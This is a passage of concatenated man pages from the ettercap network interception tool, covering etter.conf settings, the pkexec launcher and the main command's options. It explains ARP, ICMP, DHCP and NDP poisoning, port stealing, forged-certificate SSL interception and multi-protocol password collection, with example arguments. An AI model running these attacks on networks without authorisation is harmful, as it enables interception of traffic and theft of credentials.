dissectors). .TP .B connection_idle The number of seconds to wait before a connection is marked as IDLE. .TP .B connection_buffer This variable controls the size of the buffer linked to each connection. Every sniffed packet is added to the buffer and when the buffer is full the older packets are deleted to make room for newer ones. This buffer is useful to view data that went on the cable before you select and view a specific connection. The higher this value, the higher the ettercap memory occupation. By the way, the buffer is dynamic, so if you set a buffer of 100.000 byte it is not allocated all together at the first packet of a connection, but it is filled as packets arrive. .TP .B connect_timeout The timeout in seconds when using the connect() syscall. Increase it if you get a "Connection timeout" error. This option has nothing to do with connections sniffed by ettercap. It is a timeout for the connections made by ettercap to other hosts (for example when fingerprinting remote host). .TP 20 .B [stats] .TP .B sampling_rate Ettercap keeps some statistics on the processing time of the bottom half (the sniffer) and top half (the protocol decoder). These statistics are made on the average processing time of sampling_rate packets. You can decrease this value to have a more accurate real-time picture of processing time or increase it to have a smoother picture. The total average will not change, but the worst value will be heavily influenced by this value. .TP 20 .B [misc] .TP .B close_on_eof When reading from a dump file and using console or daemon UI, this variable is used to determine what action has to be done on EOF. It is a boolean value. If set to 1 ettercap will close itself (useful in scripts). Otherwise the session will continue waiting for user input. .TP .B store_profiles Ettercap collects in memory a profile for each host it detects. Users and passwords are collected there. If you want to run ettercap in background logging all the traffic, you may want to disable the collecting in memory to save system memory. Set this option to 0 (zero) to disable profiles collection. A value of 1 will enable collection for all the hosts, 2 will collect only local hosts and 3 only remote hosts (a host is considered remote if it does not belong to the netmask). .TP .B aggressive_dissectors Some dissectors (such as SSH and HTTPS) need to modify the payload of the packets in order to collect passwords and perform a decryption attack. If you want to disable the "dangerous" dissectors all together, set this value to 0. .TP .B skip_forwarded If you set this value to 0 you will sniff even packets forwarded by ettercap or by the kernel. It will generate duplicate packets in conjunction with the arp mitm method (for example). It could be useful while running ettercap in unoffensive mode on a host with more than one network interface (waiting for the multiple-interface feature...) .TP .B checksum_warning If you set the value to 0 the messages about incorrect checksums will not be displayed in the user messages windows (nor logged to a file with \-m). .br Note that this option will not disable the check on the packets, but only prevent the message to be displayed (see below). .TP .B checksum_check This option is used to completely disable the check on the checksum of the packets that ettercap receives. The check on the packets is performed to avoid ettercap spotting thru bad checsum packets (see Phrack 60.12). If you disable the check, you will be able to sniff even bad checksummed packet, but you will be spotted if someone is searching for you... .TP .B sniffing_at_startup If this option is set to 1, then ettercap will immediately start unified or bridged sniffing after the setup phase has been completed. This option helps to avoid traffic blocking when a MITM technique has been started but forgotten to start sniffing. Therefore this options is set to 1 by default. .br If this behaviour is not desired set it to 0 to manually control the status of unified or bridged sniffing after ettercap startet. However, sniffing can be stopped and started at any time while ettercap runs. .TP .B geoip_support_enable This option controls if GeoIP information shall be processed for IP addresses whether or not ettercap has been built with GeoIP support. .TP .B gtkui_prefer_dark_theme This option tries to enforce the dark variant of the applied theme. However this does only have an effect if the applied theme provides a dark variant. Normally the desktop environment controls the theme of applications. But some lightweight desktop environments doesn't support a configuration option for dark themes even when the theme provides a dark variant. To leave the theme variant setting to the desktop environment this option is set to 0 by default. .br .B NOTE: This option is only relevant in GTK mode and if ettercap has been built with full GTK3 support. .TP 20 .B [dissectors] .TP .B protocol_name This value represents the port on which the protocol dissector has to be bound. A value of 0 will disable the dissector. The name of the variable is the same of the protocol name. You can specify a non standard port for each dissector as well as multiple ports. The syntax for multiport selection is the following: port1,port2,port3,... .br NOTE: some dissectors are conditionally compiled . This means that depending on the libraries found in your system some dissectors will be enabled and some others will not. By default etter.conf contains all supported dissectors. if you got a "FATAL: Dissector "xxx" does not exists (etter.conf line yy)" error, you have to comment out the yy line in etter.conf. .TP 20 .B [curses] .TP .B color You can customize the colors of the curses GUI. .br Simply set a field to one of the following values and look at the GUI aspect :) .br Here is a list of values: 0 Black, 1 Red, 2 Green, 3 Yellow, 4 Blue, 5 Magenta, 6 Cyan, 7 White .TP 20 .B [strings] .TP .B utf8_encoding specifies the encoding to be used while displaying the packets in UTF-8 format. Use the `iconv \-\-list` command for a list of supported encodings. .TP .B remote_browser This command is executed by the remote_browser plugin each time it catches a good URL request into an HTTP connection. The command should be able to get 2 parameters: .RS .TP .B %host the Host: tag in the HTTP header. Used to create the full request into the browser. .TP .B %url The page requested inside the GET request. .RE .TP .B redir_command_on You must provide a valid command (or script) to enable tcp redirection at the kernel level in order to be able to use SSL dissection. Your script should be able to get 5 parameters: .RS .TP .B %iface The network interface on which the rule must be set .TP .B %source The source IP or network matching the packets to be redirected (default is 0.0.0.0/0, ::/0 resp. or any) .TP .B %destination The destination IP or network matching the packets to be redirected (default is 0.0.0.0/0, ::/0 resp. or any) .TP .B %port The source port of the packets to be redirected (443 for HTTPS, 993 for imaps, etc). .TP .B %rport The internally bound port to which ettercap listens for connections. .RE NOTE: this script is executed with an execve(), so you cannot use pipes or output redirection as if you were in a shell. We suggest you to make a script if you need those commands. NOTE: for this to work, you must set ec_uid to a UID what is privileged to execute the redir_command or provide a setuid program. .TP .B redir_command_off This script is used to remove the redirect rules applied by 'redir_command_on'. You should note that this script is called atexit() and thus it has not high privileges. You should provide a setuid program or set ec_uid to 0 in order to be sure that the script is executed successfully. .SH ORIGINAL AUTHORS Alberto Ornaghi (ALoR) .br Marco Valleri (NaGA) .SH PROJECT STEWARDS Emilio Escobar (exfil) .br Eric Milam (Brav0Hax) .SH OFFICIAL DEVELOPERS Mike Ryan (justfalter) .br Gianfranco Costamagna (LocutusOfBorg) .br Antonio Collarino (sniper) .br Ryan Linn .br Jacob Baines .SH CONTRIBUTORS Dhiru Kholia (kholia) .br Alexander Koeppe (koeppea) .br Martin Bos (PureHate) .br Enrique Sanchez .br Gisle Vanem .br Johannes Bauer .br Daten (Bryan Schneiders) .SH "SEE ALSO" .I "ettercap(8)" .I "ettercap_curses(8)" .I "ettercap_plugins(8)" .I "etterlog(8)" .I "etterfilter(8)" .I "ettercap\-pkexec(8)" .LP ettercap-0.8.3.1/man/ettercap-pkexec.8.in000664 000000 000000 00000010202 13711276346 020012 0ustar00rootroot000000 000000 .\" ettercap -- a multipurpose sniffer/interceptor utility .\" .\" This program is free software; you can redistribute it and/or modify .\" it under the terms of the GNU General Public License as published by .\" the Free Software Foundation; either version 2 of the License, or .\" (at your option) any later version. .\" .\" This program is distributed in the hope that it will be useful, .\" but WITHOUT ANY WARRANTY; without even the implied warranty of .\" MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the .\" GNU General Public License for more details. .\" .\" You should have received a copy of the GNU General Public License .\" along with this program; if not, write to the Free Software .\" Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. .\" .de Sp .if n .sp .if t .sp 0.4 .. .TH ETTERCAP "8" "" "ettercap @VERSION@" .SH NAME ettercap\-pkexec - graphical pkexec-based launcher for ettercap .br This launcher depends on policykit\-1 and the menu packages, and basically wraps the ettercap binary command .br with a pkexec action script usually defined on @POLKIT_DIR@/org.pkexec.ettercap.policy, .br allowing users to directly call ettercap from the desktop or menu launcher with root privileges. .br The commands available are exactly the same as the ettercap man page. Please refer to man ettercap for the list of available parameters. .br (don't forget to change "ettercap" to "ettercap\-pkexec" as caller program). example: .Sp ettercap\-pkexec \-G will start ettercap with root privileges and the GTK2 interface. .SH AUTHOR This code was originally taken from arch distro, and refactored to work with cmake system by .br Gianfranco Costamagna (LocutusOfBorg) .SH ORIGINAL AUTHORS Alberto Ornaghi (ALoR) .br Marco Valleri (NaGA) .SH PROJECT STEWARDS Emilio Escobar (exfil) .br Eric Milam (Brav0Hax) .SH OFFICIAL DEVELOPERS Mike Ryan (justfalter) .br Gianfranco Costamagna (LocutusOfBorg) .br Antonio Collarino (sniper) .br Ryan Linn .br Jacob Baines .SH CONTRIBUTORS Dhiru Kholia (kholia) .br Alexander Koeppe (koeppea) .br Martin Bos (PureHate) .br Enrique Sanchez .br Gisle Vanem .br Johannes Bauer .br Daten (Bryan Schneiders) .SH "SEE ALSO" .I "etter.conf(5)" .I "ettercap_curses(8)" .I "ettercap_plugins(8)" .I "etterlog(8)" .I "etterfilter(8)" .LP .SH AVAILABILITY https://github.com/Ettercap/ettercap/downloads .SH GIT git clone git://github.com/Ettercap/ettercap.git .br or .br git clone https://github.com/Ettercap/ettercap.git .SH BUGS Our software never has bugs. .br It just develops random features. ;) .PP .B KNOWN-BUGS .PP - ettercap doesn't handle fragmented packets... only the first segment will be displayed by the sniffer. However all the fragments are correctly forwarded. .PP + please send bug-report, patches or suggestions to or visit https://github.com/Ettercap/ettercap/issues. .PP + to report a bug, follow the instructions in the README.BUGS file .SH PHILOLOGICAL HISTORY "Even if blessed with a feeble intelligence, they are cruel and smart..." this is the description of Ettercap, a monster of the RPG Advanced Dungeons & Dragon. .PP The name "ettercap" was chosen because it has an assonance with "ethercap" which means "ethernet capture" (what ettercap actually does) and also because such monsters have a powerful poison... and you know, arp poisoning... ;) .SH The Lord Of The (Token)Ring (the fellowship of the packet) .PP "One Ring to link them all, One Ring to ping them, .br one Ring to bring them all and in the darkness sniff them." .SH Last words "Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning." - Rich Cook ettercap-0.8.3.1/man/ettercap.8.in000664 000000 000000 00000116453 13711276346 016554 0ustar00rootroot000000 000000 .\" ettercap -- a multipurpose sniffer/interceptor utility .\" .\" This program is free software; you can redistribute it and/or modify .\" it under the terms of the GNU General Public License as published by .\" the Free Software Foundation; either version 2 of the License, or .\" (at your option) any later version. .\" .\" This program is distributed in the hope that it will be useful, .\" but WITHOUT ANY WARRANTY; without even the implied warranty of .\" MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the .\" GNU General Public License for more details. .\" .\" You should have received a copy of the GNU General Public License .\" along with this program; if not, write to the Free Software .\" Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. .\" .de Sp .if n .sp .if t .sp 0.4 .. .TH ETTERCAP "8" "" "ettercap @VERSION@" .SH NAME ettercap - multipurpose sniffer/content filter for man in the middle attacks .SH ***** IMPORTANT NOTE ****** Since ettercap NG (formerly 0.7.0), all the options have been changed. Even the target specification has been changed. \fIPlease read carefully this man page.\fR .SH SYNOPSIS .B ettercap [\fIOPTIONS\fR] [\fITARGET1\fR] [\fITARGET2\fR] .PP .B If IPv6 is enabled: .br .br \fITARGET\fR is in the form \fIMAC/IPs/IPv6/PORTs\fR .br .B Otherwise, .br .br \fITARGET\fR is in the form \fIMAC/IPs/PORTs\fR .br .br where IPs and PORTs can be ranges (e.g. /192.168.0.1\-30,40,50/20,22,25) .SH DESCRIPTION Ettercap was born as a sniffer for switched LAN (and obviously even "hubbed" ones), but during the development process it has gained more and more features that have changed it to a powerful and flexible tool for man-in-the-middle attacks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many features for network and host analysis (such as OS fingerprint). .PP It has two main sniffing options: .PP \fIUNIFIED\fR, this method sniffs all the packets that pass on the cable. You can choose to put or not the interface in promisc mode (\-p option). The packet not directed to the host running ettercap will be forwarded automatically using layer 3 routing. So you can use a mitm attack launched from a different tool and let ettercap modify the packets and forward them for you. .br The kernel ip_forwarding is always disabled by ettercap. This is done to prevent a forward of a packet twice (one by ettercap and one by the kernel). This is an invasive behaviour on gateways. So we recommend you to use ettercap on the gateways ONLY with the UNOFFENSIVE MODE ENABLED. Since ettercap listens only on one network interface, launching it on the gateway in offensive mode will not allow packets to be rerouted back from the second interface. .PP \fIBRIDGED\fR, it uses two network interfaces and forward the traffic from one to the other while performing sniffing and content filtering. This sniffing method is totally stealthy since there is no way to find that someone is in the middle on the cable. You can look at this method as a mitm attack at layer 1. You will be in the middle of the cable between two entities. Don't use it on gateways or it will transform your gateway into a bridge. HINT: you can use the content filtering engine to drop packets that should not pass. This way ettercap will work as an inline IPS ;) .PP You can also perform man in the middle attacks while using the unified sniffing. You can choose the mitm attack that you prefer. The mitm attack module is independent from the sniffing and filtering process, so you can launch several attacks at the same time or use your own tool for the attack. The crucial point is that the packets have to arrive to ettercap with the correct mac address and a different ip address (only these packets will be forwarded). .PP The most relevant ettercap features are: .PP .B SSH1 support : you can sniff User and Pass, and even the data of an SSH1 connection. ettercap is the first software capable to sniff an SSH connection in FULL-DUPLEX .PP .B SSL support : you can sniff SSL secured data... a fake certificate is presented to the client and the session is decrypted. .PP .B Characters injection in an established connection : you can inject characters to the server (emulating commands) or to the client (emulating replies) maintaining the connection alive !! .PP .B Packet filtering/dropping: You can set up a filter script that searches for a particular string (even hex) in the TCP or UDP payload and replace it with yours or drop the entire packet. The filtering engine can match any field of the network protocols and modify whatever you want (see etterfilter(8)). .PP .B Remote traffic sniffing through tunnels and route mangling: You can play with linux cooked interfaces or use the integrated plugin to sniff tunneled or route-mangled remote connections and perform mitm attacks on them. .PP .B Plug-ins support : You can create your own plugin using the ettercap's API. .PP .B Password collector for : TELNET, FTP, POP, RLOGIN, SSH1, ICQ, SMB, MySQL, HTTP, NNTP, X11, NAPSTER, IRC, RIP, BGP, SOCKS 5, IMAP 4, VNC, LDAP, NFS, SNMP, HALF LIFE, QUAKE 3, MSN, YMSG (other protocols coming soon...) .PP .B Passive OS fingerprint: you scan passively the lan (without sending any packet) and gather detailed info about the hosts in the LAN: Operating System, running services, open ports, IP, mac address and network adapter vendor. .PP .B Kill a connection: from the connections list you can kill all the connections you want .SH TARGET SPECIFICATION There is no concept of SOURCE nor DEST. The two targets are intended to filter traffic coming from one to the other and vice-versa (since the connection is bidirectional). .PP \fITARGET\fR is in the form \fIMAC/IPs/PORTs\fR. .br .B NOTE: If IPv6 is enabled, \fITARGET\fR is in the form \fIMAC/IPs/IPv6/PORTs\fR. .PP If you want you can omit any of its parts and this will represent an ANY in that part. .br e.g. .br "//80" means ANY mac address, ANY ip and ONLY port 80 .br "/10.0.0.1/" means ANY mac address, ONLY ip 10.0.0.1 and ANY port .PP \fIMAC\fR must be unique and in the form 00:11:22:33:44:55 .PP \fIIPs\fR is a range of IP in dotted notation. You can specify range with the \- (hyphen) and single ip with , (comma). You can also use ; (semicolon) to indicate different ip addresses. .br e.g. .br "10.0.0.1\-5;10.0.1.33" expands into ip 10.0.0.1, 2, 3, 4, 5 and 10.0.1.33 .PP \fIPORTs\fR is a range of PORTS. You can specify range with the \- (hyphen) and single port with , (comma). .br e.g. .br "20\-25,80,110" expands into ports 20, 21, 22, 23, 24, 25, 80 and 110 .PP .B NOTE: .br you can reverse the matching of the TARGET by adding the \-R option to the command line. So if you want to sniff ALL the traffic BUT the one coming or going to 10.0.0.1 you can specify "./ettercap \-R /10.0.0.1/" .PP .B NOTE: .br TARGETs are also responsible of the initial scan of the lan. You can use them to restrict the scan to only a subset of the hosts in the netmask. The result of the merging between the two targets will be scanned. remember that not specifying a target means "no target", but specifying "//" means "all the hosts in the subnet". .PP .SH PRIVILEGES DROPPING ettercap needs root privileges to open the Link Layer sockets. After the initialization phase, the root privs are not needed anymore, so ettercap drops them to UID = 65535 (nobody). Since ettercap has to write (create) log files, it must be executed in a directory with the right permissions (e.g. /tmp/). If you want to drop privs to a different uid, you can export the environment variable EC_UID with the value of the uid you want to drop the privs to (e.g. export EC_UID=500) or set the correct parameter in the etter.conf file. .SH SSL MITM ATTACK SSL mitm attack is dependent on TCP traffic redirection to a custom listener port of ettercap. The redir_command_on and redir_command_off configuration variables take care of this (see "etter.conf(5)"). .br However, when ettercap starts, traffic for any source and any destination targeted for the redirectable services will be redirected to ettercap and the SSL stream will be intercepted. .br This may not be the desired behaviour. Therefore you can adjust the redirect rules after ettercap has been started using the selected user interface. .Sp While performing the SSL mitm attack, ettercap substitutes the real ssl certificate with its own. The fake certificate is created on the fly and all the fields are filled according to the real cert presented by the server. Only the issuer is modified and signed with the private key contained in the 'etter.ssl.crt' file. If you want to use a different private key you have to regenerate this file. To regenerate the cert file use the following commands: .Sp openssl genrsa \-out etter.ssl.crt 1024 .br openssl req \-new \-key etter.ssl.crt \-out tmp.csr .br openssl x509 \-req \-days 1825 \-in tmp.csr \-signkey etter.ssl.crt \-out tmp.new .br cat tmp.new >> etter.ssl.crt .br rm \-f tmp.new tmp.csr .PP NOTE: SSL mitm is not available (for now) in bridged mode. .PP NOTE: You can use the \-\-certificate/\-\-private\-key long options if you want to specify a different file rather than the etter.ssl.crt file. .SH OPTIONS Options that make sense together can generally be combined. ettercap will warn the user about unsupported option combinations. .TP .B SNIFFING AND ATTACK OPTIONS .PP ettercap NG has a new unified sniffing method. This implies that ip_forwarding in the kernel is always disabled and the forwarding is done by ettercap. Every packet with destination mac address equal to the host's mac address and destination ip address different for the one bound to the iface will be forwarded by ettercap. Before forwarding them, ettercap can content filter, sniff, log or drop them. It does not matter how these packets are hijacked, ettercap will process them. You can even use external programs to hijack packet. .br You have full control of what ettercap should receive. You can use the internal mitm attacks, set the interface in promisc mode, use plugins or use every method you want. .Sp IMPORTANT NOTE: if you run ettercap on a gateway, remember to re-enable the ip_forwarding after you have killed ettercap. Since ettercap drops its privileges, it cannot restore the ip_forwarding for you. .TP \fB\-M\fR, \fB\-\-mitm \fR MITM attack .br This option will activate the man in the middle attack. The mitm attack is totally independent from the sniffing. The aim of the attack is to hijack packets and redirect them to ettercap. The sniffing engine will forward them if necessary. .br You can choose the mitm attack that you prefer and also combine some of them to perform different attacks at the same time. .br If a mitm method requires some parameters you can specify them after the colon. (e.g. \-M dhcp:ip_pool,netmask,etc ) .Sp The following mitm attacks are available: .RS .TP \fBarp\fR ([remote],[oneway]) This method implements the ARP poisoning mitm attack. ARP requests/replies are sent to the victims to poison their ARP cache. Once the cache has been poisoned the victims will send all packets to the attacker which, in turn, can modify and forward them to the real destination. .Sp In silent mode (\-z option) only the first target is selected, if you want to poison multiple target in silent mode use the \-j option to load a list from a file. .Sp You can select empty targets and they will be expanded as 'ANY' (all the hosts in the LAN). The target list is joined with the hosts list (created by the arp scan) and the result is used to determine the victims of the attack. .Sp The parameter "remote" is optional and you have to specify it if you want to sniff remote ip address poisoning a gateway. Indeed if you specify a victim and the gw in the TARGETS, ettercap will sniff only connection between them, but to enable ettercap to sniff connections that pass thru the gw, you have to use this parameter. .Sp The parameter "oneway" will force ettercap to poison only from TARGET1 to TARGET2. Useful if you want to poison only the client and not the router (where an arp watcher can be in place). .Sp Example: .Sp the targets are: /10.0.0.1\-5/ /10.0.0.15\-20/ .br and the host list is: 10.0.0.1 10.0.0.3 10.0.0.16 10.0.0.18 .Sp the associations between the victims will be: .br 1 and 16, 1 and 18, 3 and 16, 3 and 18 .Sp if the targets overlap each other, the association with identical ip address will be skipped. .Sp NOTE: if you manage to poison a client, you have to set correct routing table in the kernel specifying the GW. If your routing table is incorrect, the poisoned clients will not be able to navigate the Internet. .TP \fBicmp\fR (MAC/IP) This attack implements ICMP redirection. It sends a spoofed icmp redirect message to the hosts in the lan pretending to be a better route for internet. All connections to internet will be redirected to the attacker which, in turn, will forward them to the real gateway. The resulting attack is a HALF-DUPLEX mitm. Only the client is redirected, since the gateway will not accept redirect messages for a directly connected network. BE SURE TO NOT USE FILTERS THAT MODIFY THE PAYLOAD LENGTH. you can use a filter to modify packets, but the length must be the same since the tcp sequences cannot be updated in both ways. .br You have to pass as argument the MAC and the IP address of the real gateway for the lan. .br Obviously you have to be able to sniff all the traffic. If you are on a switch you have to use a different mitm attack such as arp poisoning. .Sp NOTE: to restrict the redirection to a given target, specify it as a TARGET .Sp Example: .Sp \-M icmp:00:11:22:33:44:55/10.0.0.1 .Sp will redirect all the connections that pass thru that gateway. .TP \fBdhcp\fR (ip_pool/netmask/dns) This attack implements DHCP spoofing. It pretends to be a DHCP server and tries to win the race condition with the real one to force the client to accept the attacker's reply. This way ettercap is able to manipulate the GW parameter and hijack all the outgoing traffic generated by the clients. .br The resulting attack is a HALF-DUPLEX mitm. So be sure to use appropriate filters (see above in the ICMP section). .Sp You have to pass the ip pool to be used, the netmask and the ip of the dns server. Since ettercap tries to win the race with the real server, it DOES NOT CHECK if the ip is already assigned. You have to specify an ip pool of FREE addresses to be used. The ip pool has the same form of the target specification. .Sp If the client sends a dhcp request (suggesting an ip address) ettercap will ack on that ip and modify only the gw option. If the client makes a dhcp discovery, ettercap will use the first unused ip address of the list you have specified on command line. Every discovery consumes an ip address. When the list is over, ettercap stops offering new ip addresses and will reply only to dhcp requests. .br If you don't want to offer any ip address, but only change the router information of dhcp request/ack, you can specify an empty ip_pool. .Sp BIG WARNING: if you specify a list of ip that are in use, you will mess your network! In general, use this attack carefully. It can really mess things up! When you stop the attack, all the victims will be still convinced that ettercap is the gateway until the lease expires... .Sp Example: .Sp \-M dhcp:192.168.0.30,35,50\-60/255.255.255.0/192.168.0.1 .br reply to DHCP offer and request. .Sp \-M dhcp:/255.255.255.0/192.168.0.1 .br reply only to DHCP request. .TP \fBport\fR ([remote],[tree]) This attack implements Port Stealing. This technique is useful to sniff in a switched environment when ARP poisoning is not effective (for example where static mapped ARPs are used). .Sp It floods the LAN (based on port_steal_delay option in etter.conf) with ARP packets. If you don't specify the "tree" option, the destination MAC address of each "stealing" packet is the same as the attacker's one (other NICs won't see these packets), the source MAC address will be one of the MACs in the host list. This process "steals" the switch port of each victim host in the host list. Using low delays, packets destined to "stolen" MAC addresses will be received by the attacker, winning the race condition with the real port owner. When the attacker receives packets for "stolen" hosts, it stops the flooding process and performs an ARP request for the real destination of the packet. When it receives the ARP reply it's sure that the victim has "taken back" his port, so ettercap can re-send the packet to the destination as is. Now we can re-start the flooding process waiting for new packets. .Sp If you use the "tree" option, the destination MAC address of each stealing packet will be a bogus one, so these packets will be propagated to other switches (not only the directly connected one). This way you will be able to steal ports on other switches in the tree (if any), but you will generate a huge amount of traffic (according to port_steal_delay). The "remote" option has the same meaning as in "arp" mitm method. .Sp When you stop the attack, ettercap will send an ARP request to each stolen host giving back their switch ports. .br You can perform either HALF or FULL DUPLEX mitm according to target selection. .Sp NOTE: Use this mitm method only on ethernet switches. Use it carefully, it could produce performances loss or general havoc. .Sp NOTE: You can NOT use this method in only-mitm mode (\-o flag), because it hooks the sniffing engine, and you can't use interactive data injection. .Sp NOTE: It could be dangerous to use it in conjunction with other mitm methods. .Sp NOTE: This mitm method doesn't work on Solaris and Windows because of the lipcap and libnet design and the lack of certain ioctl(). (We will feature this method on these OSes if someone will request it...) .Sp Example: .Sp The targets are: /10.0.0.1/ /10.0.0.15/ .br You will intercept and visualize traffic between 10.0.0.1 and 10.0.0.15, but you will receive all the traffic for 10.0.0.1 and 10.0.0.15 too. .Sp The target is: /10.0.0.1/ .br You will intercept and visualize all the traffic for 10.0.0.1. .Sp .TP \fBndp\fR ([remote],[oneway]) .B NOTE: This MITM method is only supported if IPv6 support has been enabled. .Sp This method implements the NDP poisoning attack which is used for MITM of IPv6 connections. ND requests/replies are sent to the victims to poison their neighbor cache. Once the cache has been poisoned the victims will send all IPv6 packets to the attacker which, in turn, can modify and forward them to the real destination. .Sp In silent mode (\-z option) only the first target is selected, if you want to poison multiple target in silent mode use the \-j option to load a list from a file. .Sp You can select empty targets and they will be expanded as 'ANY' (all the hosts in the LAN). The target list is joined with the hosts list (created by the arp scan) and the result is used to determine the victims of the attack. .Sp The parameter "remote" is optional and you have to specify it if you want to sniff remote ip address poisoning a gateway. Indeed if you specify a victim and the gw in the TARGETS, ettercap will sniff only connection between them, but to enable ettercap to sniff connections that pass thru the gw, you have to use this parameter. .Sp The parameter "oneway" will force ettercap to poison only from TARGET1 to TARGET2. Useful if you want to poison only the client and not the router (where an arp watcher can be in place). .Sp Example: .Sp Targets are: //fe80::260d:afff:fe6e:f378/ //2001:db8::2:1/ .br Ranges of IPv6 addresses are not yet supported. .Sp NOTE: if you manage to poison a client, you have to set correct routing table in the kernel specifying the GW. If your routing table is incorrect, the poisoned clients will not be able to navigate the Internet. .Sp NOTE: in IPv6 usually the link-local address of the router is being used as the gateway address. Therefore you need to set the link-local address of the router as one target and the global-unicast address of the victim as the other in order to set up a successful IPv6 MITM attack using NDP poisoning. .RE .TP \fB\-o\fR, \fB\-\-only\-mitm\fR This options disables the sniffing thread and enables only the mitm attack. Useful if you want to use ettercap to perform mitm attacks and another sniffer (such as wireshark) to sniff the traffic. Keep in mind that the packets are not forwarded by ettercap. The kernel will be responsible for the forwarding. Remember to activate the "ip forwarding" feature in your kernel. .TP \fB\-f\fR, \fB\-\-pcapfilter \fR Set a capturing filter in the pcap library. The format is the same as tcpdump(1). Remember that this kind of filter will not sniff packets out of the wire, so if you want to perform a mitm attack, ettercap will not be able to forward hijacked packets. .br These filters are useful to decrease the network load impact into ettercap decoding module. .TP \fB\-B\fR, \fB\-\-bridge \fR BRIDGED sniffing .br You need two network interfaces. ettercap will forward form one to the other all the traffic it sees. It is useful for man in the middle at the physical layer. It is totally stealthy since it is passive and there is no way for an user to see the attacker. .br You can content filter all the traffic as you were a transparent proxy for the "cable". .TP .B OFF LINE SNIFFING .TP \fB\-r\fR, \fB\-\-read \fR OFF LINE sniffing .br With this option enabled, ettercap will sniff packets from a pcap compatible file instead of capturing from the wire. .br This is useful if you have a file dumped from tcpdump or wireshark and you want to make an analysis (search for passwords or passive fingerprint) on it. .br Obviously you cannot use "active" sniffing (arp poisoning or bridging) while sniffing from a file. .TP \fB\-w\fR, \fB\-\-write \fR WRITE packet to a pcap file .br This is useful if you have to use "active" sniffing (arp poison) on a switched LAN but you want to analyze the packets with tcpdump or wireshark. You can use this option to dump the packets to a file and then load it into your favourite application. .Sp NOTE: dump file collect ALL the packets disregarding the TARGET. This is done because you may want to log even protocols not supported by ettercap, so you can analyze them with other tools. .Sp TIP: you can use the \-w option in conjunction with the \-r one. This way you will be able to filter the payload of the dumped packets or decrypt WEP-encrypted WiFi traffic and dump them to another file. .TP .B USER INTERFACES OPTIONS .TP \fB\-T\fR, \fB\-\-text\fR The text only interface, only printf ;) .br It is quite interactive, press 'h' in every moment to get help on what you can do. .TP \fB\-q\fR, \fB\-\-quiet\fR Quiet mode. It can be used only in conjunction with the console interface. It does not print packet content. It is useful if you want to convert pcap file to ettercap log files. .Sp example: .Sp ettercap \-Tq \-L dumpfile \-r pcapfile .TP \fB\-s\fR, \fB\-\-script \fR With this option you can feed ettercap with command as they were typed on the keyboard by the user. This way you can use ettercap within your favourite scripts. There is a special command you can issue thru this command: s(x). this command will sleep for x seconds. .Sp example: .Sp ettercap \-T \-s 'lq' will print the list of the hosts and exit .br ettercap \-T \-s 's(300)olqq' will collect the infos for 5 minutes, print the list of the local profiles and exit .TP \fB\-C\fR, \fB\-\-curses\fR .br Ncurses based GUI. See ettercap_curses(8) for a full description. .TP \fB\-G\fR, \fB\-\-gtk\fR .br The nice GTK2 interface (thanks Daten...). .TP \fB\-D\fR, \fB\-\-daemonize\fR .br Daemonize ettercap. This option will detach ettercap from the current controlling terminal and set it as a daemon. You can combine this feature with the "log" option to log all the traffic in the background. If the daemon fails for any reason, it will create the file "./ettercap_daemonized.log" in which the error caught by ettercap will be reported. Furthermore, if you want to have a complete debug of the daemon process, you are encouraged to recompile ettercap in debug mode. .TP .B GENERAL OPTIONS .TP \fB\-b\fR, \fB\-\-broadcast\fR Tells Ettercap to process packets coming from Broadcast address. .TP \fB\-i\fR, \fB\-\-iface \fR Use this instead of the default one. The interface can be unconfigured (requires libnet >= 1.1.2), but in this case you cannot use MITM attacks and you should set the unoffensive flag. .TP \fB\-I\fR, \fB\-\-iflist\fR This option will print the list of all available network interfaces that can be used within ettercap. The option is particularly useful under windows where the name of the interface is not so obvious as under *nix. .TP \fB\-Y\fR, \fB\-\-secondary \fR Specify a list of (or single) secondary interfaces to capture packets from. .TP \fB\-A\fR, \fB\-\-address
\fR Use this
instead of the one autodetected for the current iface. This option is useful if you have an interface with multiple ip addresses. .TP \fB\-n\fR, \fB\-\-netmask \fR Use this instead of the one associated with the current iface. This option is useful if you have the NIC with an associated netmask of class B and you want to scan (with the arp scan) only a class C. .TP \fB\-R\fR, \fB\-\-reversed\fR Reverse the matching in the TARGET selection. It means not(TARGET). All but the selected TARGET. .TP \fB\-t\fR, \fB\-\-proto \fR Sniff only PROTO packets (default is TCP + UDP). .br This is useful if you want to select a port via the TARGET specification but you want to differentiate between tcp or udp. .br PROTO can be "tcp", "udp" or "all" for both. .TP \fB\-6\fR, \fB\-\-ip6scan\fR Send ICMPv6 probes to discover active IPv6 nodes on the link. This options sends a ping request to the all-nodes address to motivate active IPv6 hosts to respond. You should not use this option if you try to hide yourself. Therefore this option is optional. .Sp NOTE: This option is only available if IPv6 support has been enabled. .TP \fB\-z\fR, \fB\-\-silent\fR Do not perform the initial ARP scan of the LAN. .Sp NOTE: you will not have the hosts list, so you can't use the multipoison feature. you can only select two hosts for an ARP poisoning attack, specifying them through the TARGETs .TP \fB\-p\fR, \fB\-\-nopromisc\fR Usually, ettercap will put the interface in promisc mode to sniff all the traffic on the wire. If you want to sniff only your connections, use this flag to NOT enable the promisc mode. .TP \fB\-S\fR, \fB\-\-nosslmitm\fR Usually, ettercap forges SSL certificates in order to intercept https traffic. This option disables that behavior. .TP \fB\-u\fR, \fB\-\-unoffensive\fR Every time ettercap starts, it disables ip forwarding in the kernel and begins to forward packets itself. This option prevent to do that, so the responsibility of ip forwarding is left to the kernel. .br This options is useful if you want to run multiple ettercap instances. You will have one instance (the one without the \-u option) forwarding the packets, and all the other instances doing their work without forwarding them. Otherwise you will get packet duplicates. .br It also disables the internal creation of the sessions for each connection. It increases performances, but you will not be able to modify packets on the fly. .br If you want to use a mitm attack you have to use a separate instance. .br You have to use this option if the interface is unconfigured (without an ip address.) .br This is also useful if you want to run ettercap on the gateway. It will not disable the forwarding and the gateway will correctly route the packets. .TP \fB\-j\fR, \fB\-\-load\-hosts \fR It can be used to load a hosts list from a file created by the \-k option. (see below) .TP \fB\-k\fR, \fB\-\-save\-hosts \fR Saves the hosts list to a file. Useful when you have many hosts and you don't want to do an 